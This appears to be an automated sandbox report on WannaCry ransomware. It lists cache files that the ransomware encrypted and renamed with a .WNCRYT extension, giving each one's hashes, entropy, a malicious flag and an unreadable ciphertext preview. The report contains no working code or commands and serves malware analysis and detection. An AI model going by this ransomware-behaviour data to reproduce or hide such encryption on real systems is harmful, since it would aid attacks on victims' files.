MD5:	C914AE357ED8F46086265CA814A38554
SHA1:	D90831A9A401BE6A56BF192B2D89B3E83D7FFCC3
SHA-256:	1195E8D48F2D02EBDB366E9ABC50D256DCA88B41C54BDEF7A30E5AE8094DCF26
SHA-512:	B80AEC9FE8354736AB85237BB69B2592D3D994910FD9626846C1473A19CE6BBF50FFE777C2D284D3EC4F18FD52300AB4D29DEA66DB7202A02B3A1380A304FB18
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........H.(=..QJ........&..c..a....q...O#..+...>o`...(.T...J%).K.4F4i.3.....q.....Vz>8!.,....}.[KmbeQ...s..U..~.^bv!...v....\|......}O......qZ...3h.Am.3'..6.V.....g.A.r......~.`A.0%........QK.M^U.Rnh....F.N~.8..)<M.......wf.@.....%..J.\.W~K..o.................R.m.{.^gmc..9.@.."Z@..,.li...?.....?g..\...e\|..W./.<...$.z....u.=fp.(..-.R...{.E.hD5xi.9.....e@..G..j9.w.>DuL..u..O...bk.'~......u............r.`....5.....Pn.e.R.Gn+...p....X....B.....6.L.s.7...c!...a j`..c_.7O...#.V...#.b.X..9/.G/.H..3T\|Q........2...f8S..Q.........hOu.#w.......oK1F.,.M.o..,,....9...a.z....d.....o.A.........mi....<.....U.R....]..c.r..xlr.x.XU...:q......Nu..,...P..q..Jn..Q<Q0\|..<.)...8V2.%..KK...Ja....lt.,....&v.K..[.....tV...=t.........s....K-....15..w.Nq.U.......4..A`V.&;.^9..u....y..K.Fq.....Fie.7`.H.....H}.:[..w.f..<N.q.~._...K..;.+D..uO+;th....A.8...GP...9..0.0Y0.I\|.l..J.[.d.9.j.x{..]..'?......=.C.C^....6.c!....D..p..m).i..4.8(.S...\.=...<l...<_

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\-umYvKan2Fj4E8h5L_SxCu7_7dI.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	167768
Entropy (8bit):	7.998938704084624
Encrypted:	true
SSDEEP:	3072:vpJNLMgP3HXksis8cdWJDsQw7+Lz4Le46XqK69fqjo2BMrSkI6QBzEz/dyl8ORCP:vpJNI4HXk28cQJDsQw7fL3YsfQo2BVkt
MD5:	868A4DF9B02C1B208B26AF5D3332DEBA
SHA1:	22F1C1DDDA7EC13DBF1DD9A3308BFB87DF3CF635
SHA-256:	4B6594FC3748D3A25ABFA57B1FD18E507CCBD23EC34DCD1BE00A39C6638C2A3E
SHA-512:	1188E8D35792CD9F9DECBF935D58B077E9AF324E8205A647528DE3B8AEF5B9A2895EB786E5548BB5C12EAB1873C1F1555C9D23092D1DBF9AE04295180DFF05FF
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....`.U9..z.o.w`.....X+.N.nd.'.....v.x...c}o.2...../..Eu....v.z..U...L.=.:...\|.....6....G..)\|..5.&;P.g...W.....$...mg....\|..."....n..........r...(#.k-.&....y7gY.9..1.Y....9.2....B..j.Zv...........J......0.....U-.l9...6.....0.G.q..A.3........0.l....9........H..s...3`..P.(..e.5=... S9.c..`..[/.H.....Jj,.V..5.5..>.W\|,/.q..hA>..H$\|....T..%.z.h...._I..~...Q...3Td.oO.m.j..N$.#e6.....2O.hc..q&.OtRB$@....S)..G...S.9r.n....Z..X...........:...h...._h.k.Q....>.$.j.........Uk].....).L.....".3O..E.JI-J.ML%.....#{yo0(g7.D...f..[..&".f..Bzx...8.....J]...'H.>.M.....x..DN..........V./.<.......M.z.....xbxNT...g.."s,y`..l.B...D.D.h]l;[...+...j......7.....{.....+..$..._.g..@..\|..Nius.r...Q.o xt.{C.a..f...r7S._%.l.....m..2,S.._.`...Y.[.H..#...B...k...U.:]0.U.O.-.\..NR-..(.......p...._....s...;....K.F.b'...=k~............iA.j.........#U..V...iYa:..Y....c_.g)\.(...P}......G...0@.Fz.......J.\|..a....AQ..5y..B..........Z...3..8<.@....#..N..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\01qAHnoKVsYCw2MCbu8M0CLkEkU.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	119416
Entropy (8bit):	7.998536023024894
Encrypted:	true
SSDEEP:	3072:pAHKckGTxopNCABkj98d9wM41VWBmHRUkWWu2ZmB:pAH7TxoXXBwswHW8HRI2s
MD5:	8F87B657A732254026A07EABB13F4DC5
SHA1:	CE08CCDF41BFBBB1EBD008A18954B256C232E60D
SHA-256:	BDD61FAB920ADF7E0B9A854BC899A47434688FD9468F6BDA30AC63F2E22D5272
SHA-512:	78F16ABDA3A841C65097A58318AD3A634D111E6E01913C6CA157D21587D618CD1ED52C55F567CAB07A86F40BD95A4B8420221E8AE687A066566ADB9862809C15
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......I.w.U..).R...e.vrh]..... .}.......UW..V.....t.....i@.Co.N..:.....I..'!W..q...E..D.".iX....G.?4%.H....w.gE..]...#ne.......5/.!.e.].NE.m..}.T'=..M"....<&.^.R..eh..NF...t..`.,.5.......5.....L.(...4)#%.am.3.....#5..Hv...A..!.3k.... ...?.....}3.........R...........c....'L...5.....'.c.^...i<:..L.x.~{...\I.V.z.1..?...eK3.(.D....<....j.F8P../..g.s..[PvH.;4Q=.>j\...%..<.Z..%.....S..tia..D...I.b.J.[l.N7..v..O<.'.r...0.f../.2r.{7,.>..b..>.+.....Y....M.?..&.>.xc.W...>F5...$f....o.ud6.....'x.0...0N.....e.$$l.<.$7&b./@.[M..0]...BxV.].c.#...+.kO=..#x.w.O...j..{.....r..i.>.!........4\|M.....9 ._...-G..X0Z.K ........ =0..........2...FHv..l>. .9{......)\)...(.....4V...Ud..C...yE.O.\Q..Lh..d[y..2..CDQ2..$T..Q.4..Rm..MgsP..X.8dz[...../.4.e..?.Od..8..._.R...1qv......N..........7..f.D..zx..P..5.........'.JGh..*,x$v............<1l<.#p...,.........TR...3%1.'.5..#....=u.P..9@~`.J].yV.fyk.G..J.IG4"..xi..b.2.cRz'..E.5p..X.U.7..1>...@............

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\1dU-gngnSbFHyDXzxcnjLbIIJkA.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	15160
Entropy (8bit):	7.988647135347047
Encrypted:	false
SSDEEP:	384:oCOjT0SctE2EfFaCaqx0trKT261p3nqbsAuCrILcfY41JIuQZcr3oKSu:BSTCtYWA0Qp3cuyDw41JISzoKSu
MD5:	EA4D9CE7CA0607669429A3BFD3726CC8
SHA1:	CCDB954235564EF8C3207A6F4EAF4286B73CC05A
SHA-256:	45EE261C7681BB68C37A7F694D0AF4BF123C032ACF16FD2FD90E1F5F0C295762
SHA-512:	A3B8A5DCE58B8E807D5583C81EB3A1B672D1CF4CC0C191925669E5B3C24398294F6A5D1E109409495319DA12A2C42AC992C34AE4A4BDD25AE2C69155F45C1168
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....RSo. ..."j).z.a.......d..3.......!$....o..E.K#j.w..u.l....1>..`-E5.5. .....Yk..N@.2f..eW...^........zx....B> ...:&.........j.+../.R.q \|....ak.C...)l..un.............9......u.n....H.=......<^..\|Z..rG.a.z.....97.$..U....).lDp..........[..........:.......g..k.E.......x.P.....\.._.X7.........n..x.6....l.k.y.j....v\|....Q...W...k.u..G.!+.08.Iz.j.....!K$..D.......o.T...RnH.'..{..qm..is..37.k..5..L...s+~....B.....?]..?.......~=3.>$.v....S..".^o/Q.._{I...Oi..[.......'cI.N.3:.s....Y>g.1.r.....5..9%G.Ixq0.....E...7K..j...,TT.,.~2.,.x<.......!.Z.fEQ.$0...x...._....s.+EC.cl.'..K.r.....fSX....F.,....6.c,=1,....+-.c..+..V_c.....{ v;.&..wm .b.)]...M..6.......<}....w+....Q....<8.D.p.>..?.G.h..... %..9.......3....A.nR.B..7?..........-....w..#8N$....q..>....}.t.\.....(hG.....YC.z..X.....6..u.1.....x../...7H.....73.......L/..j\(.+..g..3....k\|.R...... .;.....q.R!.<.=.nd..G.X...m.P...\...?J...@...xQ-..w.} J..Dfk.....uE#`.h.%".=<.+..O

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\2tHNJ7nsvraAiCTScDCpIZGcBZ8.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	14584
Entropy (8bit):	7.986874966776535
Encrypted:	false
SSDEEP:	384:dpszy/OrzZaVWOyDLU0EpZpjXMG2cmK38QJHw:fQz8i6jXMG2BnQJHw
MD5:	DCC49E629503798CC9A05E00D57EC242
SHA1:	6706358A47DA646A35692BB61F648E8CC8125A76
SHA-256:	75AE21CE0BFD77C5EFB3FBB52D78BE771849767C9CCCA7057F1F49F9DFFAC3DE
SHA-512:	B58FCB75144D7227C8119DB077DCD0D338979CD7D3005D567AA70AEF337FBAE1AD361C520DBFFF6BAB019C02BB180D0062CA4FF6EE5CA4E2B9434F772BE33EB8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......w.6.0...~.3.p/d.c(T.5.\.....^M.z..w.....J=H\|t...,....b..X.+N&..>.h..gA....A.X{......^....&...7..%.A......b..n.cd2.H.!.e!."nq.e..DE7......2.7.p..........0.\|._..S_!o.o.PQjBV.+!..Y.....e...=l./.\|.!.9.jx.....b.\.~.=.t.N....P....kX..`.K.t..........7........X.L...nL.2.Y-f...W.3t(....l.~B]2..+%.;.g..S:.V0.l..M&....W$..E6.g...`..R....q../{...?.x2...otP...!..$.......u..#)..}.0.....jem^..\.....o.[.%.....yM%......o.z..zR...s..j.3y..U....e.5tX....Z......FW%E...V..+z..%.B.....?fF..?p}...9...=k.X.......Vz%..... x.....sG....g..{.....$.._3U.y8=......1...,l}.(gn9W.v$.\.....J%qfn.F..R......{E....2xL......f^n....;5..9..\|5.b.TQEF(w....}..Sw....1\|>...I...2..........(...Pg..\|..(/WY.....x.....P~<B.H:.Q....O..,.FvS......P-..1......Vn..cwFd!..Q......'-k..j.Q........t..N.Y...aO:.w...M<.....Z\|..H....u...\|..,o.<....:2u..)...R.7$kT...D.,.....Y....\.........x.SZ.3.Pm.yi.W..m.#b...h....]..\..t...j...uy.y.W...d..{.........h\|r[5.z,...l...F..5.MP.t......

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\3k8Z8BOb5M0fNQQd-jpULj6ZcBI.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	25144
Entropy (8bit):	7.992131875822478
Encrypted:	true
SSDEEP:	768:ypTK1LsQJbyi+ZtNxvGOd8ea5WtsP0dhEaOnilBy:qTWsQAiGNGOdHNtsPqhxOnsy
MD5:	A9D40868149E599C1B8AB29F3E1ABF18
SHA1:	F190E24953DAB3AC1AB5D52DE3A91B0E0EC60F24
SHA-256:	EB4BA42E01A7D2E57DB121EF3D50999A9801C660DA828EBAF9C5F186225A171E
SHA-512:	E68D38FDD70BAFBF5A7CF6EE6F3B93C1B78A38C542DDCAB105205D3FBE8DF2223D426CF5CEF5057D25AEE6075FC99C57E210D53736F5DBC51A3FDE44B75868A1
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....D.P....@p...th.!..b..........8...<...,2.....~$.'.ao........3...!.(y....d..N....!....(.n...".".k.)...........t...A...GXD...g."#U.v....!.....H.Y.S.!.../.......5......\.^6e.]....l.H....gQbN.s.....G.uh.....S......L..l.!.v.SH.$.......IR..s.._0........a......ET...6..R$}P+.EU..L$..U#.........f..r...g{._&..@..2...:ig.{..lAu...Bn..w.x..F."%U.xV.&]...t.Q.."k.q.>.Xq....LeE..QjZ,.%..'.AuL.;.n...i3...n..<X.h7..>..9).I.Izhu....p.-...!.F.....E:.?...nH..D...I..&o.....=.........d.k..~.S....>..5/....n.$....-F..c+..+.pO.,.X...d.-#.qA.)..%..q.FP$T...N..t........tEe\...$.;*.y(..!3..P..a.j@p......1....=U/.nEK0vzJ..a.....wRC.X.#.............5@.P..Z.My!...4~...:.B.3.. .....d.-.&.0.k..Xf..1.dy.r$.Y.k..z1...[c..J..}.._...C..H.U...>.._...B.. ^.q?..&.k7..@.P`..?G..U....f....aW. .J.tS.....Y.:.1.l....~.l.^`.....:C\|.P.S....e.yVZ9@?`{e.Po..0e:..).S.IJlQD......yPI.q............#.....n.s.i25A\...#.....p\.R.T2...........].Sov........qPMC.T..-.R&....#<3q#nS

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1240
Entropy (8bit):	7.83344421664657
Encrypted:	false
SSDEEP:	24:bkNZSLdGOJFrM4KHlaQOmlk8t3WSi9fis5Nch4vQ7BLY3UpMa:bkNmGO9Qf+Sni1LNIO3Uh
MD5:	9A6EDE0C9602E2D805ED4378A25C39B9
SHA1:	EBD492DBD95E26C7DE5757F7EE27C495D08DA757
SHA-256:	EC31E1239B6830BDB969DC963CF7824B0ADF15035B7DFB72C4A019690BA8837E
SHA-512:	2452FD5616B93F24C361793694F9B5BA80FE2866270F18D6E08A977B1D1AD3744C6E081C74A132258DD7EAB5A3445FC552EAC38078553F019F6B73C4D3C60BB9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....q..kl..,xD%.c~U.....z.ZM..N...4s._......\|.1...n...6.PE...\...F.N.S.}..)...v....4.<..1..l...).b..d..o.gW......l..3....c.....z.......2.j....-..C.,..S.1..M....`.v..K.m"u(...Q.3....yxSA*:%1.0.~&s.x..T.F1.5{z.q...gD..-...9..WC.q.DS....h\|...y..%&.R.`.................w..O..O..)..}'8..'.Fa.DV..4t.8....%..2...vb".R.hD].M....x.8..O(....$.SRX.....229..P..].{......vK..0.._{r.-.'.(t..v.\|.....F..97..=.GO.bS..xo.&...g...0T..eN.q.xz'..F.-vb.c....N.hL....@z.B6...Or.......X...6...$u..qymQ.....:...U..SLYB."..K...YB&N.P..Q~....'t..v... . ~......E.].zq.-.7...hF....a.L......o....72..P.7...c.,.K..#.#.j..R}...../$ "..wa2.[..UDe....Y.z..22....D...hC'.......Pe+2y2...%.a...S6. ........p.J.,........x]..+..N.C...5........t....G.....5R......j....!{..@2...ZBe_..F.I.K........ s.D5.r}".N.Z).1@Mln..e.J..qf.`.-.N).,d....}..{U..i.w..\a.. \|..,.".......i..../!.3Q#Kc?....(.[.z.w.....@eS.r...W..b.u;.v.q.^.?.W...n..U..:>._.C...=./.(....W.....O..t..9.._....-.K..u.0...#

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	45736
Entropy (8bit):	7.995788175070924
Encrypted:	true
SSDEEP:	768:t0HSVjLFr9KBuyWgTXLluIx+H4XPrxPPhrb1AGYlD4PDh1p+bhXhePt5Fawz9:tt1ZmrpT7FJftZJKD4GhRel5Fas
MD5:	17F7918D9D47CCCBF77922D7A1D8D21A
SHA1:	CE35A314FB0EE83C71F470E1D59C9B0F7B777767
SHA-256:	B20DF3C5FD566D8C07529955A7246602B2BA8B1161333B642562F97F9CB91135
SHA-512:	D2227FBCADBD5FF33F9D9BF377AB79AFC62C2A5234A9A39F77CA28EF377BA173FA485A335B4F6E853FCCE2A4B64E243633C6EB5E74307B0B6EE0D5CF198B3506
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....b...B..AY..^.Q..f.JS>.a..R..R.L....7..D...#...4..=....'..r)..7wW.XW/C..y.<.m..6.F)..(.... 5.[.....0N,s=:...l?O.-....W.['Ts..z1..6...F.K..Ko.:..b.(D.o.nk.W,.<^..pY-).P.m.4).Fr>...U...7..Y.2,wO.I.I+G..._.%IK.B......}f.W..p.5......e.:...k....Z..................=f..`{..O..\..O.....\.D{.0s../.5...%..nab...w..ka..2.].......k-.'..P.n/.:..._.f..9....o6.}.....v3....(..F ..W/....IXL./....@~.Ue.'.6..wI.....`...R..z...O..:-.>-+).%.ri.#j..M\|...a...H....pz...u/q~k6...h.....F....y..K.....~...T....3...j:.=........ITB......-[..\.f1..!4..C&....C.....Kp...B..z.........:....T....5.\|...DW.....=2....8.r..,<<............m.w....".H....Zs......h....Z..I..........M.G&.n~....H.....P.+...{.f....k.+zwi...t.t.............F1;qVQ....C6]..f.Yf.;.).`."~.zv..KFj......sC......J..+.R..^.B.`&!.... .....1.V..T..5.R.{.....s.2...{..A.P....V.-.8...4..&.Y..dkG.4.._Y..F.......M.Gs..e%..(O.O]m(.E.r.A.O.f.i.Q.....O..].i.....Q.x.j....n.bN..[.......^.o...\..;.A.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	127752
Entropy (8bit):	7.99854173195345
Encrypted:	true
SSDEEP:	3072:NQsuKDWUlq0AdiZfF0p65yTfa7ZIG5ObPqKM8LQn:N3uetsMZA65y+lIGmSu4
MD5:	41AAD0949F59F8E15544C275C65C5D12
SHA1:	54C8940D2269A42B24F261D38133BE4AB8FBD948
SHA-256:	EC08FE9092BA4B55994DBB39B019E4F9FB6C902BC56DCE5F876E98921BECC5CB
SHA-512:	0B6D276DE114BFB6AD9752425FC54D5F329704DDCEB5FF5CBC69147C8327C794E705AF0EBE65A3D7DCFF1EC930D5D023A4B344DD43E4CA92AEE9828936D9B78C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....J.Xh.d..(..E..bs8.O.5'....].....Eggp.b.....]..._.KGC.d(..b.E....d.$....J.z...k..z.....@.g..s...R....M0.Us...jm.Q.\|..9j..i_EZ.jJ.(G...vr>..K)q.^...a...t.Y.....3..j..2.7...n$&5:.uF.$..Q.-d.)S.....p....,..Y4.F....X....Y...$5$../.G../a......_3u...vH.............Xa...=nv....6.=yNv.K..%.5.`..+....\..v.l^..<..F..}.%.c,A......w.....^. .u..B....y..;j..3..#..7..od.......rR.....JKd.+...#3..Ye..D(...w.6.U#.V.N....(.....B..3....L.s.....7o....YM.1 .K...\O.-N.N~.......L.NN.}.1...d7...]....;.&.....rZ...:.>a...a......&.Q.@K.4.....W.%....S..a(..G....mR.b.?..yEA..l....t.ij?.V.:...4p...=.....$.G.#5)%....{.^...LI...Vtw..V\|xIN....43.P.W, .....oy...G..Vqn@...\+..Y_]'.;_.z]j.!.%..r.}.."..i...-.?.....N%B..C9..V..u..\.k...Wq.l.H.......3.j...l..m..>vb..p...pb....e.....'uk8...p.G.a.;d.-.W.&....x...5.E.X.8..K.96.OF....EX.".........ij.P&.1.H.C../.QJXN....Zd..i..1.$...1L.Z.P*.0.m..R<P.........._c.X..1....%.(.....-..c&..;...%8'._J............j.)<Q..d.!

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\6NdgdXhfsxD7_iwACPpZAmf8_AY.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	255272
Entropy (8bit):	7.999298478626608
Encrypted:	true
SSDEEP:	6144:AOtYKhQq1FozuObT9QJc5akpa4Jq6XGWBXFeUUK7g:vQqXc7sk5qIGWtFPg
MD5:	C32FB0F3B3D70B22AF5A866F380F5F99
SHA1:	F12BD36217366B5D6C1686AD35A8C421EA0CA97F
SHA-256:	377767521F97B7937A23EB2E289A0F1E8FBCEF49F5E2476F88DCACD02B86E0EB
SHA-512:	0317138627BD25A41BA6EA703427D95C89E3643DD3D15EC820617DC0DFA2E2BEE202F961A2D4AD85761583A85E68D944B7FF70330C8B94ADC971760873184381
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....>...V.9.T.w..[.{L.-.C`V..... ...w...5.j...8.n.?z\|r0.h..cT.....D......T..{'..`...2i....($LU.8........../.n.....h.YK......o..(...6..3S.....o.....O.j.y...n\|x.....V.5~A.<....z~.7...N.:.a....&?...\|..cXF...ty.e\|...G.].S.Zb=7s..[..4.)...{..x.o....b...(.............H.AO.{j.4.'n..&...NW,'R,.u=\._E..f......K......R^...T.D.eY<..[m.UvJ....S.e..(..s..........>n...7..5..lJf.r%.$Q.\|.,...a(...o+..,>{.3...y .7(.]U@0...... .V9.9._.C..wFox.].7.....9.;..\!`'&...>;.....q.~.v....f..Y.><8V..;.._..U;..... y.O......e....."..tc.Yk1..S.H.VW...E.......o.Y...;V.,T.........&Q.X./=."{{.>9r%<WuUi........85#.I[.JS.0.1)...Z.B....D..f..D..^....'...~.?...".\|..d.9`..h..\.C6c.....x.....j.....9..`).&........... .g...k= ..t.w.`..ZT.t..5...u{...x.z:K&.d"..`=.M.B...D.._S...1...Y..._x.N?..h."}....X.~ ...sl...F...;..y~.-..o..3(Ma:o.Sra............P....D....o'L.oV...Kkf+...j..`.-...&)....D.....O.+}...9.6K.c.1.Z.?....XP3.96,.,g..L.....a.'.+?.H.>c....c..:......PM.8M..DW

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\7qqJBwMPu5AjiswiDNtDGYFIoTQ.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2168
Entropy (8bit):	7.902858981235212
Encrypted:	false
SSDEEP:	48:bkjTKvld+QNhGWfF1P2D7CyHHRzGNzxSCIGSIF3JRo7x/wnE3T:ojTg7+QyWfv2HCaHp6QChxF5Ro7x/vT
MD5:	303BA5E1B8CF2E49F1E91C00E392B8F2
SHA1:	E23A27B52B24480901BE190820952157782A45C2
SHA-256:	8930ABFCF9A9841754A7384B56C393ABD891DEB1BA6FEFAAEBDCA548BF7F3B41
SHA-512:	AC149E5B0EE8AFE5F9958C4EDF52AB8F587AF6870FF25DB25D15B8EDA27473579298CC2CB98E3AC31239EA6D2C4EA7FDED53204C8CFF6F5F2DF690998B6A0477
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...._...l...m.......S9......!....rp...N\......+I....+z./.L-.N.......Xro....m..1../..i.K..B..x..@.uD.O..b.A...H..r..6gi(..Du.b<..D.M..,D.$aH.....~L.?..6?.Tv.Q.TT.;..=...--....?..C%p.p8...i.:.s.u....}..p.cE.{9....6..@F..7...i.5.%...i..X(X...m.....W.............F..Y#.EO..0.D.\|..#(....".y'..<....6EH...X...L..S.......C.5.sCQ....,..Z...~.Nj.M.....&....`c.Z..pFV-.5u.....m8bg...."..9.........%pd...S.d...M.X..q({.9.u.0...d&...O....\...R..SA.......2%l..'Va.v.\|.....L....S .....a-.f:...&?....V.......a...I.^......o.N..Y^..K.q$.....V...R.@h./1.}......n/..p.g...Y.F.x..uC(B.Q.SF.K...J.j.0.._..ky.I...WU`;...p.o.`.FI..x...+BA......a...9%..q..m.a).....\...z....gnfh.v..@.} ...:.l.V%D1.(up;[o.;.v..cA.f.".'.....\@ .O,WI..Y.(...juX.>....Q...T........\|H.Q..l..........+B.}.#=.l....E{...jf7.vl....(Ab.."$Y.s.\.y......).$.....y..\.s.;.......IA.2o....0.1?F..a......3P..k.-.7k............Og.U...+.y...'..[y.$.......Bmr.:..H#..l....j*).Qi$7...,..1..Ds..'vH

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\9NAKqY_tlD66IpqKerRN4qs4P0c.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2392
Entropy (8bit):	7.921950330997307
Encrypted:	false
SSDEEP:	48:bkGZt8o9GTD64B3V/qFHDBgEhDe7lpljkRDYQPyyG:ogi3Tlnq9BLhDeHh20uG
MD5:	1796ABE890E07EAF5396074E82BC1C20
SHA1:	366390417C4F20E0B913074A8C555A1B2EBAAB3B
SHA-256:	429C30084231B478C3953F54858A0A8034AF11A73DA9C58912CC27B9DB3B0712
SHA-512:	B06F8000AAE5FA6338FF8DEFA963B65EFF38E8D07E20A0578124C10BC979288BE0C2696B1DE104DE427FE200C70377B6B36571832EFA6AF99D517D998A89A925
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......\|...9.1....H....c...?.yIdpl5.a......g......,(-};N.....A.gi...9~Cs<\.~....S..Z.p&].U.WU..bdCr.X.B$.o8.<..m..`.P...\|k..'Lm.u".)z../W..`..Z...h....s.H...)... .....X....GwI..........xz...J.x..W...5x.a./..@B.9!..Z..H........K..D..@jw....8n...\|&z....>.......B...Y.n...;..........f..21S..j..r.j#.@.J.;.....x.......`6...j.`.../Q.....X...>..d...y.{....yr......4.6..n<.Ai.tZ.....".Y.:.....BXk.O...h.7..6wC.@9.IQ..&...S'.p..?...w?:.W.<B...^......z.'..o9.,..:0..A....A....M........ja........v2p#......!g^.$.;......kn../\|....,s..."..~.g.....!#...y0.......L....8U>im<l..........S....+...:...~c.`{..,0.<_. ....YTX.r.......J.."..G....u.............A..8..x...C_.t......Z_.b...[.qg]......2o"..a..=.q......XZi..!..>.SR........l'...=...s..Aq......(..m1....z...D,..6.m..[..K?...q..s....`C.y........2r....w.].5.M44.W....O@q....M.3\|[X........%.iL...n.XH...........+.?.......".....h.z...DS.r.c..9^....\i..1y............PKY.^...f......m..G{.sK.h..W.(.<f.....m

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\CNc30LXZ7rC8T6J9zX6Y9WnNwSA.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	10952
Entropy (8bit):	7.983310944036425
Encrypted:	false
SSDEEP:	192:qrLISm3sy4BvnSR8I1cYpsiT6NC0mBDOw9giSjoD1j1fr0hBPhj1XqzNR:etxBPc8CUiT6I0m8Wgip5f2Nhj5ENR
MD5:	89F2257E70BB218E46B91E2313EC62F5
SHA1:	8A096D4CDBB3CF14B39592F92206D34A3FD60045
SHA-256:	565BCEDB617CD5ADD9217CA0514F4B65F3707ACB0CDDA918EC6C743E7EA11A37
SHA-512:	33EC2357BE00D889CE1FBD9D5F79344744655D942B083DE92072C3716FE18A53DFA0318AA7ADDAD8B42EE32DF5FB384F2CE708EB51082EA7651435CE927778D2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......Z.,f.pj5d8...g.79n3.93.Qg.4.?..%.x..\.wd..w........E...l.~.\U......\|T..7.....L.L3.y..O9j.m..$.._.3.2]}..r=?...ok..~.`YH....h..m`..<...[.>4>3..j.24...n.i.....o....K3..@f.".i..R.l.s.ud.-M...........g..a..Nx...........p....9.)...o>..4...............)......1L.{S.Y..@J.T1....:..#..zv....S.^...A..."..,...Pr...0..)i.v..7..v/..1.....-............)..#E....y.<.......~.......p..F.r.a..M.t.....p.@V3X...h...4.3J.[..<........A......\]...P?.O7.1.F..f...A.......A&W.}._..{V..D.O@....m..%"6.._;1...]OVtj.C...m,}..f.$.&.&..}...(....R.......c.\.^'.S..o.0.k...,.......C'~TSe......D....F.X..d....8......$c..#.?.L.b...>..avr.;.L....T...jk+....{G.#9...#nA.@.........r....r.....8.Zw,.dbjs..i&<....&...K.....P..]]`V..r....[.@..1..\..X]&.9.E... .....&.....f.R9.m.w.v.\/...K...F.....7..0...@.Z>.%..w..\..t.}N.........]L..bL.m.h...........d..Z}. .h.....+.v..U]..J.....P.-r...m.}\|...e...U.R....i.eE.E.E..#.E.*....$.y=%...W3.l...m..oU..ph.G.o.r$.3.ve....sj.!.gY.?.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\CP3WQRJOZtCvRBRiz0lJ9gBoHsg.br[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	88920
Entropy (8bit):	7.997837006018646
Encrypted:	true
SSDEEP:	1536:vNm23kVLfv3AdLmeQvxU4X/TMPXPt4aAz4zqli77P6yYdzUBDIZVLuJ4ExdP5ZQp:v8pHlc4XQPXPtg4yImzUiVLuJ4adwp
MD5:	ADB317C32910D4A6DFFFFBF12EB8A996
SHA1:	C271BD2057C9E28E3CDD163C72B5A696A2FE3523
SHA-256:	006ADC8F83E239FD6B2F452E0BCBCCF9D4550B77F76E9705A9493DEF2DD0268C
SHA-512:	3556D9F6DA55EA58F036EEE7ABF3BFB170F083F2AF72C2BF8D2BE2076A0421F37343DEF302DF55E597FD76778AADD16CB57905393D9F75A653D67197C469CE39
Malicious:	true
Reputation:	unknown
